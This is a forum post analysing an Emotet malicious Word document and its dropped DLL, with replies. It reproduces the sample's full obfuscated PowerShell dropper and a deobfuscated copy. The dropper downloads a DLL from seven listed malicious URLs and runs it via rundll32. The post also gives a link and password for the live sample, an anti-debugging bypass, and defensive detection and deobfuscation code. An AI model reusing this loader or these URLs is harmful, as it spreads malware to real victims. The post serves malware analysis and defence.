[Original] Emotet malware analysis: the DLL
Posted: 2021-1-5 19:01


Emotet has been fairly active lately, so here is a relatively recent version. I'm still a beginner at this.

File name: 8760_Z-55353.doc

MD5: 9B848638A47AAF9EAC9D21CD1EBB1B3E

SHA256: BA817F35FCE65F20C11D9E0A0C53B54248D825801DA89E455DDF1BBC3FA4CB7A

After obtaining the sample:

The document shows "Security Warning: Macros have been disabled". Click "Enable Content", then press Alt+F11 to view the macro code.

Debugging shows that the variable Mrfzpndjp3s0k holds the key information.

The following macro code is executed:

The part worth attention is the PowerShell command: -ENCOD means the command is passed base64-encoded.

After deobfuscation:

we get the following URLs:

VirusTotal flags the URLs as malicious.

The payload is downloaded into a directory on the system.

From the macro code we can see that the downloaded payload is run through RunDLL32.exe.

It is executed with the command: rundll32.exe Ppnq9j.dll #1
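As an added example (not part of the original post), the following Python flags the two stages just described in process-creation telemetry: a PowerShell started with -w hidden and an -EncodedCommand prefix such as -ENCOD beneath an Office process, and rundll32 running a DLL out of a user profile by export ordinal. The events, PIDs and the base64 fragment are constructed; the command lines follow the ones on this page.

```python
import re
from collections import namedtuple

# pid, parent pid, full image path, command line (one process-creation event)
ProcEvent = namedtuple("ProcEvent", "pid ppid image cmdline")

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
# rundll32 given a DLL under a user profile followed by an export ordinal ("x.dll,#1" or "x.dll #1")
ORDINAL_DLL = re.compile(r"\\users\\[^\\]+\\.*?\.dll\s*[, ]\s*#\d+", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def is_hidden_encoded_powershell(cmdline):
    """-w[indowstyle] hidden plus any prefix of -EncodedCommand (-e, -enc, -ENCOD, ...) or -ec."""
    toks = cmdline.lower().split()
    hidden = any(t.startswith("-w") and "-windowstyle".startswith(t) and toks[i + 1:i + 2] == ["hidden"]
                 for i, t in enumerate(toks))
    encoded = any(t == "-ec" or (t.startswith("-e") and "-encodedcommand".startswith(t)) for t in toks)
    return hidden and encoded

def ancestors(ev, by_pid):
    seen = set()
    while ev.ppid in by_pid and ev.ppid not in seen:
        seen.add(ev.ppid)
        ev = by_pid[ev.ppid]
        yield ev

def detect(events):
    """Return (pid, reason) for every event matching one of the two stages."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        name = basename(e.image)
        if name in ("powershell.exe", "pwsh.exe") and is_hidden_encoded_powershell(e.cmdline):
            office = [a for a in ancestors(e, by_pid) if basename(a.image) in OFFICE]
            if office:
                alerts.append((e.pid, "hidden encoded PowerShell under " + basename(office[0].image)))
        if name == "rundll32.exe" and ORDINAL_DLL.search(e.cmdline):
            alerts.append((e.pid, "rundll32 running a user-profile DLL by export ordinal"))
    return alerts

# Constructed events mirroring the chain on this page (PIDs and the base64 fragment are made up).
EVENTS = [
    ProcEvent(100, 1, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "WINWORD.EXE /n 8760_Z-55353.doc"),
    ProcEvent(101, 100, r"C:\Windows\System32\cmd.exe", "cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD JABjAFYA"),
    ProcEvent(102, 101, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "POwersheLL -w hidden -ENCOD JABjAFYA"),
    ProcEvent(103, 102, r"C:\Windows\System32\rundll32.exe", r"rundll32 C:\Users\libaobao\Y559jsv\Iewfmy3\Ppnq9j.dll,#1"),
    ProcEvent(201, 1, r"C:\Windows\System32\rundll32.exe", r"rundll32.exe shell32.dll,Control_RunDLL"),  # benign control
]
```

Running detect(EVENTS) returns one alert for the PowerShell (pid 102) and one for the ordinal rundll32 (pid 103); the Control Panel rundll32 is not flagged.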

With Huorong Sword (火绒剑) you can see it constantly exchanging data with the C2 server.

MD5: FB9BA59D6C8E03C970323085E39C0290

SHA256: 406281452C48E699BD85F73977F80926812E9340F165BD4E61154C8E8961E61D

Look at the export and import tables:

The export table has one key function, "RunDLL".

The import table contains the sensitive functions VirtualAlloc and GetProcAddress.

The resource section contains unidentified binary data.

Go straight into IDA and look at RunDLL():

Write a launcher to make debugging easier:

After decryption by the function My_10001F80_Decode, dumping the variable v5 yields a PE file.

It also has a RunDLL export, and no import table.

The decryption algorithm is as follows, at offset 0x10001F80:

Loading the newly dumped DLL into IDA shows that RunDLL() contains only two functions.

sub_10009716() is a fairly complex mix of loops and branches with no directly visible API calls.

Almost all APIs are called by hash.

Enter v7(), which is the new RunDLL(), at offset 0x56E8.

To make it easier to inspect in IDA, dump v7.

Unfortunately IDA cannot recognize RunDLL, so my guess is that the sample adds obfuscation after decryption, or performs some kind of initialization.

That doesn't stop me from analyzing it, though.

At 0x00156135 the API address is obtained. Run an OD script that writes each called API into a section added beforehand, to get a rough picture of the flow.

APIs:

Interestingly, OD hangs once execution reaches WaitForSingleObject: in between, the sample creates an event object and a thread, then waits on that event object with WaitForSingleObject.

The thread calls ReadDirectoryChangesW, which retrieves information describing changes in the specified directory, and then sets the event object.

If you try to step over ReadDirectoryChangesW, OD simply stops responding, so this call has to be NOPed out. This is an uncommon anti-debugging trick.

Running OD again shows the following APIs:

The DLLs loaded are as follows:

Get the machine name:

Enumerate processes and save the information:

Copy it all together:

Encrypt the data:

Encrypted with RSA and AES:

CryptExportKey fills in data:

CryptGetHashParam fills in data:

0016475B produces %u.%u.%u.%u
001647CA sprintf's it into the C2 server address

The server list is at 0x16F200.

C2 server:

The packet is sent out:

Other servers also receive data:

Decrypt the data:

After decryption it is a blob that can't be parsed yet, and then it loops and keeps sending packets.

It calls InternetReadFile several times to download data, decrypts it, allocates memory with VirtualAlloc and creates a thread with CreateThread to run the malicious payload.

I didn't follow it any further.

I had analyzed a similar sample before, so I knew the rough flow. The hard part is using some tricks to defeat the sample's anti-reversing measures.

https://bbs.pediy.com/upload/tmp/906247_FQ2A352MFDA7KNU.rar
Sample uploaded; the archive password is kanxue.

cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. &  POwersheLL -w hidden -ENCOD
 
$cVNgAS= [TyPe]("{1}{0}{3}{2}"-F 'YSTeM.I','S','Ry','O.DirECTo');   set-ITEM ("variaBle"+":l6U"+"YH"+"N")  ([TYpe]("{5}{0}{7}{4}{8}{2}{3}{6}{1}"-F 'Y','Ger','EPoI','Ntm','TEM.Net.se','s','AnA','s','RvIc')); $Xdz_t_i=('Au'+('z0z'+'qx'));$Pii8oen=$B0xk04r + [char](64) + $Val6qax;$Lr_lqnw=(('Pk'+'9')+('1'+'5w')+'o'); (  iTEM varIABlE:CvngAS).vAlUE::"CREATe`di`ReCtORY"($HOME + (('{'+'0}Y'+'5'+'59jsv{0}Iewfmy3'+'{'+'0}'-F[CHaR]92));$M_dnbs4=('Q'+('u'+'gs')+('yo'+'d'));  (Get-iTem ("vaRIaBLe"+":l6u"+"YH"+"n")).vaLuE::"sECuR`IT`yprOT`ocOL" = (('Tl'+'s')+'12');$X2thqmg=('J'+('zz'+'z6'+'2m'));$Qocy_bg = (('Pp'+'nq')+'9j');$Zy7z7hd=('Fg'+'04'+('cc'+'g'));$E5pam4e=('Wi'+('0'+'8j')+'ay');$Tpdue32=$HOME+((('MRPY'+'55')+('9j'+'s')+'v'+'M'+('R'+'PI')+'e'+('wfm'+'y3')+('MR'+'P'))."Re`PLaCE"(('M'+'RP'),'\'))+$Qocy_bg+('.d'+'ll');$R6utvyl=(('G'+'pr')+('s'+'79')+'j');$Z1fmvqh=N`e`w-OBJe`CT NET.wEBclIeNt;$Ny4mnvx=(('h'+(('t'+'tp:qq)('))+(('s'+'2)(qq'))+')'+(('('+'s2'))+((')'+'(op'))+('h'+'eli')+'a'+('sb'+'re'+'wery'+'.')+'c'+'om'+'q'+'q'+((')('+'s2'))+((')(w'+'p-'))+('in'+'c')+'l'+('u'+'de')+(('sq'+'q)(s2)(ciA'+'j'+'cg'))+(('jqq)(s2)(@http'+':q'+'q'+')'))+(('(s'+'2)(qq'+')'+'(s'))+'2'+((')('))+(('t'+'ong'+'daiha'+'noi.c'+'omqq)(s2'))+((')'+'(847346324'+'2'+'3'+'4234q'))+(('q)(s2'+')'+'('+'rpnvXm'))+'q'+'q'+((')'+'(s2'+')(@http'+':qq)'+'(s2)'+'(qq'))+((')'+'(s2'))+')'+(('(c'))+('he'+'rk')+'a'+'s'+('hc'+'han')+('u'+'.c')+(('om'+'qq)(s'+'2)('+'Z:qq'+')'))+(('(s2)'+'(4ZE8q'+'q'+')('))+'s2'+')'+(('(@ht'+'t'+'ps:q'+'q)'+'(s2'))+((')('+'qq)('))+(('s2)'+'(x'))+('uan'+'thin')+('hs'+'hop')+('.'+'com')+(('qq'+')(s'+'2)('))+('ac'+'ura-')+'md'+'x'+('-snc'+'k')+(('0q'+'q)('))+(('s2)(2L'+'U7'+'w'+'qq)('+'s2)(@'+'ht'+'t'+'ps:'))+'q'+(('q)(s'+'2)(qq)'+'(s'))+(('2)'))+(('(c'))+('a'+'llto')+'re'+'p'+(('air'+'.c'+'omqq)(s'+'2)(a'))+(('ss'+'e'+'tsqq)'+'(s2'))+((')'+'(09'))+('erZ'+'FF')+'qq'+((')(s'+'2'))+((')('+'@h'))+('tt'+'p')+((':'+'qq'+')(s2)'+'(qq)'+'(s2)(se'))+('r'+'vicio'+'s')+'.'+('s'+'em')+('per'+
'ti.'+'com')+(('q'+'q)'))+('(s2'+')')+(('(w'))+(('p-'+'adminqq)'+'(s2'+')('+'2'))+(('I'+'y'+'ZE7kqq'+')('))+(('s'+'2)(@'))+('ht'+'t')+('ps:'+'qq')+((')'+'(s2'))+')'+(('(q'))+(('q)(s'+'2)'+'(gia'))+('tot'+'365')+'.'+('com'+'q')+(('q)(s2'+')'))+('('+'w'+'p-conten'+'t'+'qq)(s2)')+(('(u'+'p'))+'lo'+'a'+(('d'+'sqq)('))+(('s2'+')(2'+'0'))+('20'+'qq')+((')(s'+'2'))+((')(Sx'+'qq'+')(s2)('))))."REPl`A`cE"((((('qq'+')'))+'('+(('s2'+')(')))),([array]('/'),('hw'+'e'))[0])."sPL`it"($L_hxsiu + $Pii8oen + $Ow4xjha);$N8fhtx6=(('N'+'949')+'lw'+'n');foreach ($Pgsjh8n in $Ny4mnvx | S`OrT-ob`jecT {G`ET-`RAnDom}){try{$Z1fmvqh."doWN`loAd`FiLe"($Pgsjh8n, $Tpdue32);$Z5rj4au=('Ho'+('_06y'+'i'));If ((.('Get-'+'It'+'em') $Tpdue32)."len`g`TH" -ge 30704) {&('ru'+'nd'+'ll32') $Tpdue32,'#1'."T`OStRi`Ng"();$H0_4bw3=(('S'+'dvq')+('w'+'69'));break;$Wyq13os=('S8'+'fy'+('8x'+'6'))}}catch{}}$Tuaxof9=('Se'+('d'+'90')+'_z')
# Deobfuscated form of the script above (the unused decoy variables are kept as in the original)
$cVNgAS=System.IO.Directory;
set-item(variaBle:l6UYHN)System.Net.ServicePointManager;
$Xdz_t_i=Auz0zqx;
$Pii8oen=$B0xk04r + @ + $Val6qax;   # $B0xk04r and $Val6qax are never defined, so this is just '@', the URL-list separator
$Lr_lqnw=Pk915wo;
(item variable:cvngas).value::"createdirectory"($home + "\y559jsv\iewfmy3\");   # [System.IO.Directory]::CreateDirectory
$M_dnbs4=Qugsyod;
(Get-iTem (variable:l6uyhn)).value::"securityprotocol" = tls12;   # [System.Net.ServicePointManager]::SecurityProtocol = Tls12
$X2thqmg=Jzzz62m;
$Qocy_bg=Ppnq9j;   # name of the dropped DLL: ('Pp'+'nq')+'9j' in the obfuscated script
$Zy7z7hd=Fg04ccg;
$E5pam4e=Wi08jay;
$Tpdue32=$HOME+(MRPY559jsvMRPIewfmy3MRP."RePLaCE"(('MRP'),'\'))+$Qocy_bg+('.dll');   # $HOME\Y559jsv\Iewfmy3\Ppnq9j.dll
$R6utvyl=Gprs79j;
$Z1fmvqh=System.Net.WebClient;
 
# 'qq)(s2)(' is replaced with '/' and the string is then split on '@', giving this list:
$Ny4mnvx=
http://opheliasbrewery.com/wp-includes/ciAjcgj/
http://tongdaihanoi.com/847346324234234/rpnvXm/
http://cherkashchanu.com/Z:/4ZE8/
https://xuanthinhshop.com/acura-mdx-snck0/2LU7w/
https://calltorepair.com/assets/09erZFF/
http://servicios.semperti.com/wp-admin/2IyZE7k/
https://giatot365.com/wp-content/uploads/2020/Sx/
;
 
$N8fhtx6=N949lwn;
foreach ($Pgsjh8n in $Ny4mnvx | SOrT-objecT {GET-RAnDom})   # try the URLs in random order
{
    try
    {
        $Z1fmvqh."doWNloAdFiLe"($Pgsjh8n, $Tpdue32);   # WebClient.DownloadFile into the path above
        $Z5rj4au=Ho_06yi;
        If ((.('Get-Item') $Tpdue32)."lengTH" -ge 30704)   # only accept a download of at least 30704 bytes
        {
            &('rundll32') $Tpdue32,'#1'."TOStRiNg"();   # rundll32 <dll> #1: run export ordinal 1
            $H0_4bw3=Sdvqw69;
            break;   # stop after the first usable download
            $Wyq13os=S8fy8x6
        }
    }catch{}
}
$Tuaxof9=Sed90_z
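An added example (not code from the original post) of mechanically undoing the string tricks this loader uses: backticks inside names, the -F format operator, '+'-joined fragments, and the 'qq)(s2)(' and '@' separators that hide the URL list. It runs on a constructed, shortened sample written in the same style as the script above; only the first two of the page's URLs are included.

```python
import re

# Constructed, shortened sample in the style of the loader above: -F format strings,
# '+'-joined fragments, backticks inside names, 'qq)(s2)(' standing for '/' and '@'
# separating the URLs. Only the first two of the page's URLs are included.
SAMPLE = r"""$cVNgAS= [TyPe]("{1}{0}{3}{2}"-F 'YSTeM.I','S','Ry','O.DirECTo');
$Qocy_bg = (('Pp'+'nq')+'9j');
$Z1fmvqh=N`e`w-OBJe`CT NET.wEBclIeNt;
$Ny4mnvx=(('h'+('t'+'tp:qq)(s2)(qq)(s2)('))+('op'+'heli')+('asb'+'re'+'wery.c')+'om'+('qq)(s2)(wp-'+'inc')+('lu'+'des')+('qq)(s2)(ciA'+'jcgj')+('qq)(s2)(@http:'+'qq)(s2)(')+('qq)(s2)(t'+'ong')+('daihanoi.c'+'om')+('qq)(s2)(84734632'+'4234234')+('qq)(s2)(rpnvXm'+'qq)(s2)('))."REPl`A`cE"(('qq'+')(s2)('),'/')."sPL`it"('@');"""

# ("{1}{0}" -F 'a','b')  ->  ('ba')
FORMAT_OP = re.compile(r"\(\s*\"((?:\{\d+\})+)\"\s*-F\s*('[^']*'(?:\s*,\s*'[^']*')*)\s*\)", re.I)
# 'a' + 'b'  ->  'ab'
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
# ('lit') -> 'lit', but never the argument list of a call such as ."split"('@') or [Type]('x')
PAREN = re.compile(r"(?<![\w\"\]])\(\s*('[^']*')\s*\)")
# 'lit'."replace"('from','to') and 'lit'."split"('sep'), in any casing
REPLACE = re.compile(r"'([^']*)'\.\"?replace\"?\(\s*'([^']*)'\s*,\s*'([^']*)'\s*\)", re.I)
SPLIT = re.compile(r"'([^']*)'\.\"?split\"?\(\s*'([^']*)'\s*\)", re.I)
URL = re.compile(r"https?://[^\s'\"@,)]+")

def _fold_format(m):
    args = re.findall(r"'([^']*)'", m.group(2))
    return "('" + re.sub(r"\{(\d+)\}", lambda n: args[int(n.group(1))], m.group(1)) + "')"

def deobfuscate(script):
    s = script.replace("`", "")                 # backticks inside names are no-ops in PowerShell
    s = FORMAT_OP.sub(_fold_format, s)
    prev = None
    while prev != s:                            # fold fragments and redundant parentheses until stable
        prev = s
        s = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", s)
        s = PAREN.sub(r"\1", s)
    s = REPLACE.sub(lambda m: "'" + m.group(1).replace(m.group(2), m.group(3)) + "'", s)
    s = SPLIT.sub(lambda m: "@(" + ",".join("'%s'" % p for p in m.group(1).split(m.group(2))) + ")", s)
    return s

def extract_urls(script):
    """Download URLs the loader would try, in the order they appear in the script."""
    return URL.findall(deobfuscate(script))

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print(extract_urls(SAMPLE))
```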
#include <iostream>
#include <windows.h>

// Signature of the exported RunDLL entry point (it takes no arguments in this sample).
typedef int(WINAPI* fnRunDLL)();
fnRunDLL My_RunDLL;

int main()
{
    // Load the dropped payload from the path the PowerShell stage wrote it to.
    HMODULE hModule = LoadLibraryA("C:\\Users\\libaobao\\Y559jsv\\Iewfmy3\\Ppnq9j.dll");
    if (hModule == NULL)
    {
        std::cerr << "LoadLibraryA failed: " << GetLastError() << std::endl;
        return 1;
    }
    My_RunDLL = (fnRunDLL)GetProcAddress(hModule, "RunDLL");
    if (My_RunDLL == NULL)
    {
        std::cerr << "RunDLL export not found" << std::endl;
        return 1;
    }
    My_RunDLL();   // set a breakpoint here and step into the payload's RunDLL
    return 0;
}
// 1. Initialize variables
MOV dwGetAPIAddr, 00156135       // 1. where the API address is obtained
MOV dwWriteAPIAddr, 01236000  // 2. where the IAT is filled in (the section added beforehand)
MOV dwBreakPoint,0015B0D4                 // 3. breakpoint
 
// 2. Set up the environment: clear all breakpoints, set the ones needed
BC    // clear all software breakpoints
BPHWC // clear hardware breakpoints
BPMC  // clear memory breakpoints
 
BPHWS dwGetAPIAddr, "x" // break when execution reaches this address
BPHWS dwBreakPoint, "x" // break when execution reaches this address
 
// 3. Build the loop and handle each branch
LOOP0:
RUN // F9
 
CMP dwGetAPIAddr,eip
JNZ case1
MOV [dwWriteAPIAddr],eax
ADD dwWriteAPIAddr,4
JMP LOOP0
case1:
CMP dwBreakPoint,eip
JNZ LOOP0
MSG "Reached!"
Resolved APIs on the first run (OD hangs at WaitForSingleObject):
76EB1280  kernel32.GetProcessHeap
76EACF41  kernel32.GetModuleHandleA
77B22DD6  ntdll.RtlAllocateHeap
76EB3C01  kernel32.LoadLibraryW
76EABBD0  kernel32.HeapFree
775DCA64  advapi32.OpenSCManagerW
775E369C  advapi32.CloseServiceHandle
761C5708  shell32.SHGetFolderPathW
76EB3C26  kernel32.GetModuleFileNameW
76EAD9E8  kernel32.lstrlenW
76E98BFA  kernel32.lstrcpyW
76EB679E  kernel32.GetCommandLineW
76159EE8  shell32.CommandLineToArgvW
76EACA64  kernel32.LocalFree
76EACC56  kernel32.CreateFileW
76EA38AD  kernel32.GetFileInformationByHandleEx
76EACA7C  kernel32.CloseHandle
76EB2FDE  kernel32.GetSystemTimeAsFileTime
76E9F731  kernel32.CreateToolhelp32Snapshot
76E9FA35  kernel32.Process32FirstW
76EACAC4  kernel32.GetCurrentProcessId
76E9FACA  kernel32.Process32NextW
76EA59D7  kernel32.OpenProcess
76EA5C28  kernel32.QueryFullProcessImageNameW
7790BB71  shlwapi.PathFindFileNameW
76EB3386  kernel32.CreateEventW
76EB375D  kernel32.CreateThread
76E9EB4E  kernel32.GetTickCount64
76EABA60  kernel32.GetTickCount
76EABA90  kernel32.WaitForSingleObject
Resolved APIs on the second run, after NOPing out the ReadDirectoryChangesW call:
76EB1280  kernel32.GetProcessHeap
76EACF41  kernel32.GetModuleHandleA
77B22DD6  ntdll.RtlAllocateHeap
76EB3C01  kernel32.LoadLibraryW
76EABBD0  kernel32.HeapFree
775DCA64  advapi32.OpenSCManagerW
775E369C  advapi32.CloseServiceHandle
761C5708  shell32.SHGetFolderPathW
76EB3C26  kernel32.GetModuleFileNameW
76EAD9E8  kernel32.lstrlenW
76E98BFA  kernel32.lstrcpyW
76EB679E  kernel32.GetCommandLineW
76159EE8  shell32.CommandLineToArgvW
76EACA64  kernel32.LocalFree
76EACC56  kernel32.CreateFileW
76EA38AD  kernel32.GetFileInformationByHandleEx
76EACA7C  kernel32.CloseHandle
76EB2FDE  kernel32.GetSystemTimeAsFileTime
76E9F731  kernel32.CreateToolhelp32Snapshot
76E9FA35  kernel32.Process32FirstW
76EACAC4  kernel32.GetCurrentProcessId
76E9FACA  kernel32.Process32NextW
76EA59D7  kernel32.OpenProcess
76EA5C28  kernel32.QueryFullProcessImageNameW
7790BB71  shlwapi.PathFindFileNameW
76EB3386  kernel32.CreateEventW
76EB375D  kernel32.CreateThread
76E9EB4E  kernel32.GetTickCount64
76EABA60  kernel32.GetTickCount
775DDF14  advapi32.CryptAcquireContextW
75DDD718  crypt32.CryptDecodeObjectEx
775DC532  advapi32.CryptImportKey
775D8EE9  advapi32.CryptGenKey
775DDF4E  advapi32.CryptCreateHash
76E96BA9  kernel32.GetComputerNameA
76EA04B6  kernel32.GetWindowsDirectoryW
76EB7598  kernel32.GetVolumeInformationW
77B99A60  ntdll._snprintf
76EAA611  kernel32.lstrlenA
77B365E3  ntdll.RtlGetVersion
76E9BE77  kernel32.GetNativeSystemInfo
76EAB744  kernel32.ProcessIdToSessionId
76EB450E  kernel32.WideCharToMultiByte
77B04CC0  ntdll.memcpy
77613198  advapi32.CryptDuplicateHash
775F779B  advapi32.CryptEncrypt
775D91EA  advapi32.CryptExportKey
775DDF7E  advapi32.CryptGetHashParam
775DDF66  advapi32.CryptDestroyHash
77B03CD6  ntdll._snwprintf
77B3283D  ntdll.RtlRandomEx
75F61D76  urlmon.ObtainUserAgentString
76EB452B  kernel32.MultiByteToWideChar
77979197  wininet.InternetOpenW
7797492C  wininet.InternetConnectW
77974A42  wininet.HttpOpenRequestW
77967741  wininet.InternetSetOptionW
7797BA12  wininet.HttpSendRequestW
7796AB49  wininet.InternetCloseHandle
77975C75  wininet.HttpQueryInfoW
7796B406  wininet.InternetReadFile
77613178  advapi32.CryptDecrypt
775DC54A  advapi32.CryptVerifySignatureW
76EB53B2  kernel32.FindFirstFileW
756A1856  kernel32.VirtualAlloc
756A34D5  kernel32.CreateThread


Last edited by baobao雅 on 2021-1-5 19:08; reason: uploaded the sample
Latest replies (4)
#2 (2021-1-6 16:07)
Thanks for sharing!
#3 (2021-1-7 17:46)
Thanks for sharing!
#4 (2022-11-1 10:16)
Hi, I recently got a sample too, and it is the same family as yours. I'd like to know how you found the spot where the in-memory DLL with no import table fills its IAT, that is, the "observe the APIs" part under heading 3.4.
#5 (2022-11-1 10:25)
Quoting YEHONG: Hi, I recently got a sample too, and it is the same family as yours. I'd like to know how you found the spot where the in-memory DLL with no import table fills its IAT, that is, the "observe the APIs" part under heading 3.4.
Set a breakpoint on GetProcAddress and trace back from there; then, statically, look for functions that are called many times and take hash-like arguments. That is roughly the function you are looking for.